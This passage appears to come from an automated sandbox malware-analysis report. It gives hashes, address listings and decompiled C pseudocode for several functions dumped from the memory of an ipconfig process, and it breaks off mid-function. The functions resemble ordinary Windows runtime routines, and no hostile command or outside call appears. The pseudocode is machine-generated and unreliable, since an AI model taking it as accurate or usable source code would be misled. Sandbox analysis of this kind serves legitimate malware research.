              0x02f16aa2
              0x02f16aa5
              0x02f16aaf
              0x02f16ab1
              0x02f16ab8
              0x02f16ab9
              0x02f16abb
              0x02f16abe
              0x02f16ac5
              0x02f16ac5
              0x02f16aaf
              0x02f16a40
              0x02f16a26
              0x02f169fe
              0x02f16ace
              0x02f16ad0
              0x02f16ad3
              0x02f16ad8
              0x02f16adf
              0x02f16adf
              0x02f16ae8
              0x02f16aef
              0x02f16aef
              0x02f16af9
              0x02f16b06

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 390158fc7a5c48a70eb6a5a3f5679b1ee000c3cb2d6c9079229c49a2c576a05f
              • Instruction ID: b7002c382adb3930ce5a8967293a7fbcf66befaaa3efe57253c5ba351bb8c92a
              • Opcode Fuzzy Hash: 390158fc7a5c48a70eb6a5a3f5679b1ee000c3cb2d6c9079229c49a2c576a05f
              • Instruction Fuzzy Hash: 534168B1D40208AFEB24DFA5D940BFEBBF9EF48754F14812AE914A7280DB709945CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E95210 Relevance: .1, Instructions: 107COMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E02E95210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E02E952A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E02ED95D0();
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E02EAEB70(_t54, 0x2f879a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E02ED95D0();
								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E02EAEB70(_t54, 0x2f879a0);
						}
						return _t52;
					}
					L5:
					_t33 = E02EDF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E02EAEB70(_t54, 0x2f879a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E02ED95D0();
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














              0x02e95220
              0x02e95224
              0x02ef0d13
              0x02ef0d16
              0x02ef0d19
              0x02e9522a
              0x02e9522a
              0x02e9522d
              0x02e9522d
              0x02e95231
              0x02e95235
              0x02e95239
              0x02ef0d5c
              0x02ef0d62
              0x00000000
              0x00000000
              0x02ef0d6a
              0x02ef0d7b
              0x02ef0d7f
              0x02ef0d81
              0x02ef0d84
              0x02ef0d95
              0x02ef0d95
              0x02ef0d6c
              0x02ef0d71
              0x02ef0d71
              0x02ef0d9a
              0x00000000
              0x02e9524a
              0x02e9524a
              0x02e95250
              0x02ef0d24
              0x02ef0d35
              0x02ef0d39
              0x02ef0d3b
              0x02ef0d3e
              0x02ef0d50
              0x02ef0d50
              0x02ef0d26
              0x02ef0d2b
              0x02ef0d2b
              0x00000000
              0x02ef0d55
              0x02e95256
              0x02e9525b
              0x02e95265
              0x02ef0da7
              0x02e9526b
              0x02e9526e
              0x02e95272
              0x02ef0db1
              0x02ef0db4
              0x02ef0dc5
              0x02ef0dc5
              0x02e95272
              0x02e95278
              0x02e9527e
              0x02e9528a
              0x02e9528c
              0x02e9528d
              0x00000000
              0x02e95280
              0x02e95282
              0x02e95288
              0x02e9529f
              0x02e95292
              0x00000000
              0x02e95292
              0x00000000
              0x02e95288
              0x02e9527e

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0237808abfc122d212b45618a490ac4a62eb80b02ee41677fb9d05711aeb0284
              • Instruction ID: 9893b44c3a481376c6c193c431a075bcb59f065f2de1700133f9d49d50117ae4
              • Opcode Fuzzy Hash: 0237808abfc122d212b45618a490ac4a62eb80b02ee41677fb9d05711aeb0284
              • Instruction Fuzzy Hash: D9314A322C1600DBCB32AB14CC51B76B7B6FF00764F51E62AF5190B595D732F800CA90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECA61C Relevance: .1, Instructions: 106COMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E02ECA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x2f70220);
				E02EED08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x2f87b9c; // 0x0
				_t55 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E02EED0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x2f87b10 =  *0x2f87b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x2f8536c; // 0x400568
					if( *_t51 != 0x2f85368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x2f85368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x2f8536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E02ECA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















              0x02eca61c
              0x02eca61e
              0x02eca623
              0x02eca628
              0x02eca62b
              0x02eca62d
              0x02eca648
              0x02eca64a
              0x02eca64f
              0x02f09b44
              0x02eca6ec
              0x02eca6f1
              0x02eca6f1
              0x02eca655
              0x02eca657
              0x02eca65a
              0x02eca65d
              0x02eca662
              0x02eca663
              0x02eca667
              0x02eca668
              0x02eca66d
              0x02eca706
              0x02eca706
              0x02f09bda
              0x02f09be6
              0x02f09beb
              0x00000000
              0x02f09beb
              0x02eca679
              0x02f09b7a
              0x00000000
              0x02f09b7a
              0x02eca683
              0x02eca6f4
              0x02eca6f7
              0x02eca6f9
              0x02eca6fd
              0x02eca6a0
              0x02eca6a0
              0x02eca6ad
              0x02eca6af
              0x02eca6b4
              0x02f09ba7
              0x02f09bac
              0x00000000
              0x00000000
              0x02f09bc6
              0x02f09bce
              0x02f09bd1
              0x02f09bd3
              0x02f09bd3
              0x00000000
              0x02f09bd1
              0x02eca6bd
              0x02eca6c3
              0x02eca6c6
              0x02eca6d2
              0x02eca701
              0x02eca704
              0x00000000
              0x02eca704
              0x02eca6d4
              0x02eca6d6
              0x02eca6d9
              0x02eca6db
              0x02eca6e1
              0x02eca6e6
              0x02eca6e8
              0x02eca6e8
              0x02eca6ea
              0x00000000
              0x02eca6ea
              0x02eca688
              0x02eca692
              0x02eca694
              0x02eca699
              0x00000000
              0x00000000
              0x02eca69d
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 04e1f03c9dec3ce22ac3f678449a61e47ff8f297dfa5dae469cf2d4fab8b9d6b
              • Instruction ID: d61ec3d09ad0bb8e9e5ce1c4abb55f6a7ae69e01e2884b746d8cee2a2bfe3a9d
              • Opcode Fuzzy Hash: 04e1f03c9dec3ce22ac3f678449a61e47ff8f297dfa5dae469cf2d4fab8b9d6b
              • Instruction Fuzzy Hash: 39416BB5A40209DFCB05DF98C990BA9BBF2BF49718F25C0ADE914AB385D774A901CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED3D43 Relevance: .1, Instructions: 106COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02ED3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E02EA7B60(0, _t61, 0x2e711c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E02EA7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L02EB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















              0x02ed3d4c
              0x02ed3d50
              0x02ed3d55
              0x02ed3d5e
              0x02f0e79a
              0x00000000
              0x02f0e79a
              0x02ed3d68
              0x02f0e789
              0x02ed3d9d
              0x02ed3da3
              0x02ed3daf
              0x02ed3db5
              0x02ed3dbc
              0x02ed3dc4
              0x02ed3dc9
              0x02ed3dce
              0x02f0e7ae
              0x02f0e7ae
              0x02ed3dde
              0x02ed3de2
              0x02ed3de7
              0x02ed3e0d
              0x02ed3e13
              0x02ed3e16
              0x02ed3e1e
              0x02ed3e25
              0x02ed3e28
              0x00000000
              0x00000000
              0x02ed3e2a
              0x02ed3e2f
              0x02ed3e37
              0x02ed3e37
              0x00000000
              0x02ed3e37
              0x02ed3e31
              0x00000000
              0x02ed3e31
              0x02ed3e20
              0x02ed3e20
              0x02ed3e35
              0x00000000
              0x02ed3de9
              0x02ed3de9
              0x02ed3de9
              0x02ed3dee
              0x02ed3dfd
              0x02ed3dff
              0x02ed3e02
              0x02ed3e05
              0x02ed3e05
              0x00000000
              0x02ed3df0
              0x02ed3de7
              0x02f0e78f
              0x02f0e794
              0x02ed3d79
              0x02ed3d84
              0x02ed3d89
              0x02ed3d8e
              0x00000000
              0x02f0e7a4
              0x02ed3d96
              0x02ed3d9a
              0x00000000
              0x02ed3d9a
              0x00000000
              0x02f0e794
              0x02ed3d6e
              0x02ed3d73
              0x00000000
              0x02f0e7b5
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6faae59dcccc188d8d307996e84776b8e7aa9f38fcea7f38c60f51e98f10049e
              • Instruction ID: 10fb01cd90a7211e2fc9270be130d9cf39ad599fa872471b9989de335ac8eee6
              • Opcode Fuzzy Hash: 6faae59dcccc188d8d307996e84776b8e7aa9f38fcea7f38c60f51e98f10049e
              • Instruction Fuzzy Hash: 0A31D035A45614DBC7248F29C881A6BBBE5EF46744B05D4AAF945CB390E730D842CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F17016 Relevance: .1, Instructions: 104COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E02F17016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x2f8d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E02F16B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E02F16B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E02EB7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E02ED9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E02EDB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L02EB4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















              0x02f17016
              0x02f1701e
              0x02f1702b
              0x02f17033
              0x02f17037
              0x02f1703c
              0x02f1703e
              0x02f17041
              0x02f17045
              0x02f1704a
              0x02f17050
              0x02f17055
              0x02f1705a
              0x02f17062
              0x02f17062
              0x02f1705a
              0x02f17064
              0x02f17064
              0x02f17067
              0x02f17071
              0x02f17096
              0x02f1709b
              0x02f170a2
              0x02f170a6
              0x02f170a7
              0x02f170ad
              0x02f170b3
              0x02f170b6
              0x02f170bb
              0x02f170c3
              0x02f170c3
              0x02f170c6
              0x02f170cd
              0x02f170dd
              0x02f170e0
              0x02f170e2
              0x02f170e2
              0x02f170ee
              0x02f17101
              0x02f170f0
              0x02f170f9
              0x02f170f9
              0x02f1710a
              0x02f1710e
              0x02f17112
              0x02f17117
              0x02f17118
              0x02f17118
              0x02f170bb
              0x02f1711d
              0x02f17123
              0x02f17131
              0x02f17131
              0x02f17136
              0x02f1713d
              0x02f1713e
              0x02f1713f
              0x02f1714a
              0x02f1714a
              0x02f17084
              0x02f17088
              0x00000000
              0x02f1708e
              0x02f1708e
              0x02f17092
              0x00000000
              0x02f17092

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a248e405532771072d6f8decd43c3d6e4afde8b9d035a06bec55fd047bb530b3
              • Instruction ID: 9f2b652343d12a1dd5ee0e5132e6336eed5e97c6b92adb3d093f67a551807447
              • Opcode Fuzzy Hash: a248e405532771072d6f8decd43c3d6e4afde8b9d035a06bec55fd047bb530b3
              • Instruction Fuzzy Hash: 8C31B372A047519BC321EF28CC40A6BF3E9BFC8740F444A29F99997690E730E904CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EBC182 Relevance: .1, Instructions: 104COMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E02EBC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E02EB7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E02F68D34(_v8, _t80);
					}
					E02EB2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E02EAFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E02F68833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E02EAFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E02EDB180();
						if(_a4 != 0) {
							E02EB2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E02EBBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E02EBBB2D(_t16, _t15);
						E02EBB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E02EAFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E02EAFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E02EAFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















              0x02ebc18d
              0x02ebc18f
              0x02ebc191
              0x02ebc19b
              0x02ebc1a0
              0x02ebc1d4
              0x02ebc1de
              0x02f02d6e
              0x02ebc1e4
              0x02ebc1e4
              0x02ebc1e4
              0x02ebc1ec
              0x02f02d7d
              0x02f02d7d
              0x02ebc1f3
              0x02ebc1ff
              0x02f02d88
              0x02f02d8d
              0x02f02d94
              0x02f02d94
              0x02f02d9f
              0x02f02da4
              0x02f02dab
              0x02f02db0
              0x02f02db2
              0x02f02db3
              0x02f02db4
              0x02f02dbc
              0x02f02dc3
              0x02f02dc3
              0x02ebc205
              0x02ebc205
              0x02ebc208
              0x02ebc20e
              0x02ebc211
              0x02ebc216
              0x02ebc219
              0x02ebc21f
              0x02ebc222
              0x02ebc22c
              0x02ebc234
              0x02ebc23a
              0x02ebc23f
              0x02ebc245
              0x02ebc24b
              0x02ebc251
              0x02ebc25a
              0x02ebc276
              0x02ebc27d
              0x02ebc27d
              0x02ebc25c
              0x02ebc25c
              0x00000000
              0x02ebc25e
              0x02ebc1a4
              0x02ebc1aa
              0x02ebc1b3
              0x02ebc265
              0x02ebc26c
              0x02ebc26c
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
              • Instruction ID: 2acc515bd79ed6b5f6c1471c88f88f4f422c064b32871ba6ab0b466dd02086b9
              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
              • Instruction Fuzzy Hash: 3B317771A85546BED706EBB0C890BEAF765BF42348F14E15BE51C9B200DB356A09CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F43D40 Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              C-Code - Quality: 70%
              			E02F43D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x2f8d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E02EB2280(_t34, 0x2f88a6c);
				_t64 =  *0x2f85768; // 0x77ad5768
				if(_t64 != 0x2f85768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77ad5770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E02EAFFB0(_t53, _t64, 0x2f88a6c);
						 *0x2f8b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E02EB2280(_t45, 0x2f88a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x2f85768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E02EAFFB0(_t51, _t64, 0x2f88a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
